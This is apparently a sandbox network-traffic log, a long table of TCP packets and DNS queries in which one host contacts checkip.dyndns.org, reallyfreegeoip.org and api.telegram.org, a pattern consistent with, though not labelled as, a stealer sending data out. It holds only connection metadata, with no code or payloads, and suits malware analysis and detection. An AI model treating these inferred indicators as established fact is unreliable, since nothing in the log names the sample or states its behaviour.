                                                                                                              Jan 10, 2025 23:19:26.710901976 CET49794443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:26.710989952 CET44349794104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:26.879167080 CET44349794104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:26.879343987 CET44349794104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:26.879703045 CET49794443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:26.880026102 CET49794443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:26.884480953 CET4979080192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:26.885735989 CET4980080192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:26.889457941 CET8049790132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:26.889511108 CET4979080192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:26.890523911 CET8049800132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:26.890575886 CET4980080192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:26.890674114 CET4980080192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:26.895462036 CET8049800132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:27.570959091 CET8049800132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:27.572381973 CET49807443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:27.572419882 CET44349807104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:27.572496891 CET49807443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:27.572748899 CET49807443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:27.572757959 CET44349807104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:27.621057987 CET4980080192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:28.047166109 CET44349807104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:28.068474054 CET49807443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:28.068490028 CET44349807104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:28.190753937 CET44349807104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:28.190917969 CET44349807104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:28.191037893 CET49807443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:28.191560030 CET49807443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:28.212661028 CET4980080192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:28.217659950 CET8049800132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:28.217832088 CET4980080192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:28.225470066 CET49811443192.168.2.6149.154.167.220
                                                                                                              Jan 10, 2025 23:19:28.225505114 CET44349811149.154.167.220192.168.2.6
                                                                                                              Jan 10, 2025 23:19:28.225636959 CET49811443192.168.2.6149.154.167.220
                                                                                                              Jan 10, 2025 23:19:28.226231098 CET49811443192.168.2.6149.154.167.220
                                                                                                              Jan 10, 2025 23:19:28.226243973 CET44349811149.154.167.220192.168.2.6
                                                                                                              Jan 10, 2025 23:19:28.876218081 CET44349811149.154.167.220192.168.2.6
                                                                                                              Jan 10, 2025 23:19:28.876295090 CET49811443192.168.2.6149.154.167.220
                                                                                                              Jan 10, 2025 23:19:28.880736113 CET49811443192.168.2.6149.154.167.220
                                                                                                              Jan 10, 2025 23:19:28.880759954 CET44349811149.154.167.220192.168.2.6
                                                                                                              Jan 10, 2025 23:19:28.881172895 CET44349811149.154.167.220192.168.2.6
                                                                                                              Jan 10, 2025 23:19:28.882560968 CET49811443192.168.2.6149.154.167.220
                                                                                                              Jan 10, 2025 23:19:28.927331924 CET44349811149.154.167.220192.168.2.6
                                                                                                              Jan 10, 2025 23:19:29.119581938 CET44349811149.154.167.220192.168.2.6
                                                                                                              Jan 10, 2025 23:19:29.119668961 CET44349811149.154.167.220192.168.2.6
                                                                                                              Jan 10, 2025 23:19:29.119931936 CET49811443192.168.2.6149.154.167.220
                                                                                                              Jan 10, 2025 23:19:29.125955105 CET49811443192.168.2.6149.154.167.220
                                                                                                              Jan 10, 2025 23:19:31.127842903 CET4982680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:31.132822990 CET8049826132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:31.132956028 CET4982680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:31.133126020 CET4982680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:31.137907982 CET8049826132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:31.804013014 CET8049826132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:31.807331085 CET4982680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:31.812174082 CET8049826132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:32.016213894 CET8049826132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:32.048552036 CET49833443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:32.048655987 CET44349833104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:32.048747063 CET49833443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:32.052582026 CET49833443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:32.052618027 CET44349833104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:32.058578968 CET4982680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:32.547471046 CET44349833104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:32.547545910 CET49833443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:32.549191952 CET49833443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:32.549222946 CET44349833104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:32.549706936 CET44349833104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:32.589828968 CET49833443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:32.594505072 CET49833443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:32.635337114 CET44349833104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:32.709820032 CET44349833104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:32.709901094 CET44349833104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:32.709995985 CET49833443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:32.712992907 CET49833443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:32.716073990 CET4982680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:32.720952988 CET8049826132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:32.949526072 CET8049826132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:32.953133106 CET49841443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:32.953203917 CET44349841104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:32.953299999 CET49841443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:32.953644991 CET49841443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:32.953671932 CET44349841104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:32.996110916 CET4982680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:33.438858032 CET44349841104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:33.440267086 CET49841443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:33.440331936 CET44349841104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:33.598932981 CET44349841104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:33.599015951 CET44349841104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:33.599083900 CET49841443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:33.599504948 CET49841443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:33.602669001 CET4982680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:33.603760958 CET4984580192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:33.607641935 CET8049826132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:33.608593941 CET4982680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:33.608649969 CET8049845132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:33.608731031 CET4984580192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:33.608896017 CET4984580192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:33.613681078 CET8049845132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:34.301940918 CET8049845132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:34.303122044 CET49851443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:34.303150892 CET44349851104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:34.303231955 CET49851443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:34.303612947 CET49851443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:34.303627968 CET44349851104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:34.355464935 CET4984580192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:34.766153097 CET44349851104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:34.767688036 CET49851443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:34.767718077 CET44349851104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:34.911021948 CET44349851104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:34.911222935 CET44349851104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:34.911417007 CET49851443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:34.911616087 CET49851443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:34.916270018 CET4985680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:34.921092987 CET8049856132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:34.921267986 CET4985680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:34.921372890 CET4985680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:34.926115036 CET8049856132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:35.617870092 CET8049856132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:35.619158983 CET49862443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:35.619225979 CET44349862104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:35.619359970 CET49862443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:35.619589090 CET49862443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:35.619622946 CET44349862104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:35.668001890 CET4985680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:36.094206095 CET44349862104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:36.096353054 CET49862443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:36.096385956 CET44349862104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:36.256346941 CET44349862104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:36.256427050 CET44349862104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:36.256660938 CET49862443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:36.256910086 CET49862443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:36.260040998 CET4985680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:36.261147022 CET4986880192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:36.264954090 CET8049856132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:36.265161037 CET4985680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:36.265984058 CET8049868132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:36.266052008 CET4986880192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:36.266180992 CET4986880192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:36.270935059 CET8049868132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:36.947066069 CET8049868132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:36.948384047 CET49872443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:36.948407888 CET44349872104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:36.948472977 CET49872443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:36.948724985 CET49872443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:36.948735952 CET44349872104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:36.996078968 CET4986880192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:37.421818018 CET44349872104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:37.423290968 CET49872443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:37.423340082 CET44349872104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:37.568108082 CET44349872104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:37.568192005 CET44349872104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:37.568279982 CET49872443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:37.568974972 CET49872443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:37.572149992 CET4986880192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:37.573182106 CET4987780192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:37.577334881 CET8049868132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:37.577399015 CET4986880192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:37.577944994 CET8049877132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:37.578015089 CET4987780192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:37.578123093 CET4987780192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:37.582890987 CET8049877132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:38.259926081 CET8049877132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:38.261353970 CET49882443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:38.261404037 CET44349882104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:38.261487007 CET49882443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:38.261780024 CET49882443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:38.261795998 CET44349882104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:38.308726072 CET4987780192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:38.727926016 CET44349882104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:38.729399920 CET49882443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:38.729429007 CET44349882104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:38.885452986 CET44349882104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:38.885615110 CET44349882104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:38.885703087 CET49882443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:38.886117935 CET49882443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:38.889339924 CET4987780192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:38.889960051 CET4988880192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:38.894393921 CET8049877132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:38.894809008 CET8049888132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:38.894886971 CET4987780192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:38.894922018 CET4988880192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:38.895000935 CET4988880192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:38.899789095 CET8049888132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:39.574192047 CET8049888132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:39.575193882 CET49893443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:39.575236082 CET44349893104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:39.575294971 CET49893443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:39.575542927 CET49893443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:39.575557947 CET44349893104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:39.619004011 CET4988880192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:39.863255978 CET6184253192.168.2.6162.159.36.2
                                                                                                              Jan 10, 2025 23:19:39.868108034 CET5361842162.159.36.2192.168.2.6
                                                                                                              Jan 10, 2025 23:19:39.868226051 CET6184253192.168.2.6162.159.36.2
                                                                                                              Jan 10, 2025 23:19:39.873106956 CET5361842162.159.36.2192.168.2.6
                                                                                                              Jan 10, 2025 23:19:40.041199923 CET44349893104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:40.042757988 CET49893443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:40.042803049 CET44349893104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:40.191893101 CET44349893104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:40.191984892 CET44349893104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:40.192042112 CET49893443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:40.192442894 CET49893443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:40.195264101 CET4988880192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:40.196197987 CET6184680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:40.200207949 CET8049888132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:40.200277090 CET4988880192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:40.200958014 CET8061846132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:40.201037884 CET6184680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:40.201100111 CET6184680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:40.205826998 CET8061846132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:40.331340075 CET6184253192.168.2.6162.159.36.2
                                                                                                              Jan 10, 2025 23:19:40.336688995 CET5361842162.159.36.2192.168.2.6
                                                                                                              Jan 10, 2025 23:19:40.337215900 CET6184253192.168.2.6162.159.36.2
                                                                                                              Jan 10, 2025 23:19:40.899538040 CET8061846132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:40.900893927 CET61851443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:40.900942087 CET44361851104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:40.901034117 CET61851443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:40.901269913 CET61851443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:40.901282072 CET44361851104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:40.949203968 CET6184680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:41.367234945 CET44361851104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:41.368753910 CET61851443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:41.368787050 CET44361851104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:41.502340078 CET44361851104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:41.502388954 CET44361851104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:41.502545118 CET61851443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:41.502810955 CET61851443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:41.505080938 CET6184680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:41.506069899 CET6185880192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:41.510046005 CET8061846132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:41.510104895 CET6184680192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:41.510946989 CET8061858132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:41.511023045 CET6185880192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:41.511126041 CET6185880192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:41.515860081 CET8061858132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:42.203093052 CET8061858132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:42.204391003 CET61863443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:42.204487085 CET44361863104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:42.204595089 CET61863443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:42.204835892 CET61863443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:42.204871893 CET44361863104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:42.246139050 CET6185880192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:42.658394098 CET44361863104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:42.667645931 CET61863443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:42.667685032 CET44361863104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:42.795073032 CET44361863104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:42.795141935 CET44361863104.21.32.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:42.795222998 CET61863443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:42.795726061 CET61863443192.168.2.6104.21.32.1
                                                                                                              Jan 10, 2025 23:19:42.809214115 CET6185880192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:42.814153910 CET8061858132.226.247.73192.168.2.6
                                                                                                              Jan 10, 2025 23:19:42.814230919 CET6185880192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:42.820058107 CET61868443192.168.2.6149.154.167.220
                                                                                                              Jan 10, 2025 23:19:42.820095062 CET44361868149.154.167.220192.168.2.6
                                                                                                              Jan 10, 2025 23:19:42.820209026 CET61868443192.168.2.6149.154.167.220
                                                                                                              Jan 10, 2025 23:19:42.820743084 CET61868443192.168.2.6149.154.167.220
                                                                                                              Jan 10, 2025 23:19:42.820759058 CET44361868149.154.167.220192.168.2.6
                                                                                                              Jan 10, 2025 23:19:43.454948902 CET44361868149.154.167.220192.168.2.6
                                                                                                              Jan 10, 2025 23:19:43.455050945 CET61868443192.168.2.6149.154.167.220
                                                                                                              Jan 10, 2025 23:19:43.456449032 CET61868443192.168.2.6149.154.167.220
                                                                                                              Jan 10, 2025 23:19:43.456461906 CET44361868149.154.167.220192.168.2.6
                                                                                                              Jan 10, 2025 23:19:43.456834078 CET44361868149.154.167.220192.168.2.6
                                                                                                              Jan 10, 2025 23:19:43.458605051 CET61868443192.168.2.6149.154.167.220
                                                                                                              Jan 10, 2025 23:19:43.499330044 CET44361868149.154.167.220192.168.2.6
                                                                                                              Jan 10, 2025 23:19:43.603176117 CET4973480192.168.2.6132.226.247.73
                                                                                                              Jan 10, 2025 23:19:43.713975906 CET44361868149.154.167.220192.168.2.6
                                                                                                              Jan 10, 2025 23:19:43.714071035 CET44361868149.154.167.220192.168.2.6
                                                                                                              Jan 10, 2025 23:19:43.714153051 CET61868443192.168.2.6149.154.167.220
                                                                                                              Jan 10, 2025 23:19:43.716383934 CET61868443192.168.2.6149.154.167.220
                                                                                                              Jan 10, 2025 23:19:58.141113997 CET4984580192.168.2.6132.226.247.73
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jan 10, 2025 23:19:16.061748981 CET5281753192.168.2.61.1.1.1
                                                                                                              Jan 10, 2025 23:19:16.069133997 CET53528171.1.1.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:17.022197962 CET5412853192.168.2.61.1.1.1
                                                                                                              Jan 10, 2025 23:19:17.039062977 CET53541281.1.1.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:28.213293076 CET5181253192.168.2.61.1.1.1
                                                                                                              Jan 10, 2025 23:19:28.220693111 CET53518121.1.1.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:39.862517118 CET5355999162.159.36.2192.168.2.6
                                                                                                              Jan 10, 2025 23:19:40.346451044 CET5772753192.168.2.61.1.1.1
                                                                                                              Jan 10, 2025 23:19:40.353282928 CET53577271.1.1.1192.168.2.6
                                                                                                              Jan 10, 2025 23:19:42.812287092 CET5641953192.168.2.61.1.1.1
                                                                                                              Jan 10, 2025 23:19:42.819336891 CET53564191.1.1.1192.168.2.6
                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Jan 10, 2025 23:19:16.061748981 CET192.168.2.61.1.1.10x87deStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:19:17.022197962 CET192.168.2.61.1.1.10xe5d9Standard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:19:28.213293076 CET192.168.2.61.1.1.10x9a7fStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:19:40.346451044 CET192.168.2.61.1.1.10x2e03Standard query (0)206.23.85.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:19:42.812287092 CET192.168.2.61.1.1.10x5d31Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Jan 10, 2025 23:19:16.069133997 CET1.1.1.1192.168.2.60x87deNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:19:16.069133997 CET1.1.1.1192.168.2.60x87deNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:19:16.069133997 CET1.1.1.1192.168.2.60x87deNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:19:16.069133997 CET1.1.1.1192.168.2.60x87deNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:19:16.069133997 CET1.1.1.1192.168.2.60x87deNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:19:16.069133997 CET1.1.1.1192.168.2.60x87deNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:19:17.039062977 CET1.1.1.1192.168.2.60xe5d9No error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:19:17.039062977 CET1.1.1.1192.168.2.60xe5d9No error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:19:17.039062977 CET1.1.1.1192.168.2.60xe5d9No error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:19:17.039062977 CET1.1.1.1192.168.2.60xe5d9No error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:19:17.039062977 CET1.1.1.1192.168.2.60xe5d9No error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:19:17.039062977 CET1.1.1.1192.168.2.60xe5d9No error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:19:17.039062977 CET1.1.1.1192.168.2.60xe5d9No error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:19:28.220693111 CET1.1.1.1192.168.2.60x9a7fNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                              Jan 10, 2025 23:19:40.353282928 CET1.1.1.1192.168.2.60x2e03Name error (3)206.23.85.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
